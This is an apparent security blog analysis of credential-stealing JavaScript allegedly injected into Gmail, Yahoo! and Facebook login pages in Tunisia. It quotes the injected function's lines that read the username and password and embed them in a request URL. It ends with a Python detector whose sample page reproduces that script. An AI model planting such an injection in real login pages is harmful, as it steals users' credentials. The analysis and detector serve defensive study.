It’s only January and we’ve just witnessed a first: cyber insecurity bringing down a government. The government of Tunisia, a WikiLeaks target, has been under severe scrutiny for corruption ever since WikiLeaks exposed some dodgy practices.
The Tech Herald highlighted how the Tunisian government conducted a “cyber retaliation,” in which usernames and passwords were harvested, presumably by the government, to monitor and/or manipulate citizens’ communications. Facebook, Gmail and Yahoo! were affected.
Imperva’s Application Defense Center (ADC) obtained the pages allegedly injected by the Tunisian government:
Gmail - http://pastebin.com/G6iEjENK
Yahoo! - http://pastebin.com/M5CbYTWj
Facebook - http://pastebin.com/1JsrcZBf
Sorry, but this entry is about to get quite geeky. For those of you who enjoy the anatomy of a hack, though, it’s quite interesting. If you’re not a geek, these are basically pictures of a hacker’s hand in the cookie jar.
The method is the same on all three pages: the credential-stealing JavaScript function hAAAQ3d() is added to the usual form post.
Compare the original Gmail form submission:
With the injected one (note the highlight):
Here's the actual hAAAQ3d script:
The hAAAQ3d script grabs the username and password:
- The username is stored in the us3r (= user) variable. var us3r = frm.Email.value;
- The password is stored in the pa55 (= pass) variable. var pa55 = frm.Passwd.value;
The attack script then sends the credentials (after scrambling them with the h6h function) to the nonexistent URL "http://www.google.com/wo0dh3ad" (= woodhead) as parameters:
var url = "http://www.google.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55);
Since the Tunisian government controls all internet transactions, it can log every request to this link and so easily obtain the credentials. The request itself is bound to fail, because the URL does not exist, but that is beside the point: the credentials are already in the query string when the request crosses the government-controlled network on its way to Google, and it is addressed to the same domain the user is already talking to, so nothing about it looks out of place.
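As an added example (not Imperva’s code, and not the injected script itself), here is a defender-side check that flags the pattern described above in a served login page: an inline function wired into the form submission that reads the password field’s .value and splices it into a URL carrying a query string. It assumes the hook is attached through the form’s onsubmit attribute, and the two HTML pages are constructed samples whose script lines mirror the ones quoted above.

```python
import re
from html.parser import HTMLParser

class LoginPageAudit(HTMLParser):
    """Collect password field names, form onsubmit handlers and inline scripts."""
    def __init__(self):
        super().__init__()
        self.password_fields, self.submit_hooks, self.scripts = [], [], []
        self._in_script = False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields.append(a.get("name") or "")
        if tag == "form" and a.get("onsubmit"):
            self.submit_hooks.append(a["onsubmit"])
        self._in_script = tag == "script"
    def handle_endtag(self, tag):
        self._in_script = self._in_script and tag != "script"
    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def find_credential_hooks(html):
    """Names of inline functions that are called from a form's onsubmit, read a
    password field's .value and splice it into a URL carrying a query string."""
    audit = LoginPageAudit()
    audit.feed(html)
    script_text = "\n".join(audit.scripts)
    hits = []
    for hook in audit.submit_hooks:
        for fname in re.findall(r"([A-Za-z_$][\w$]*)\s*\(", hook):
            m = re.search(rf"function\s+{re.escape(fname)}\s*\(", script_text)
            if not m:
                continue                  # not defined inline; out of scope here
            body = script_text[m.end():]  # everything after the function header
            reads_pw = any(re.search(rf"\.{re.escape(f)}\.value", body)
                           for f in audit.password_fields if f)
            builds_url = re.search(r"https?://[^\"'\s]+\?", body) is not None
            if reads_pw and builds_url and fname not in hits:
                hits.append(fname)
    return hits

# Constructed samples: a plain login form, and the same form with the hook added.
CLEAN_LOGIN = ('<form action="/login" method="post"><input type="text" name="Email">'
               '<input type="password" name="Passwd"><input type="submit"></form>')
INJECTED_LOGIN = ('<form action="/login" method="post" onsubmit="return hAAAQ3d(this)">'
                  '<input type="text" name="Email"><input type="password" name="Passwd">'
                  '<input type="submit"></form><script>function hAAAQ3d(frm) { var us3r = frm.Email.value;'
                  ' var pa55 = frm.Passwd.value; var url = "http://www.google.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55); }</script>')
```

The check is deliberately heuristic: it catches the shape of this injection, not every way of exfiltrating a password, and a hook attached from script rather than from the onsubmit attribute would need a separate rule.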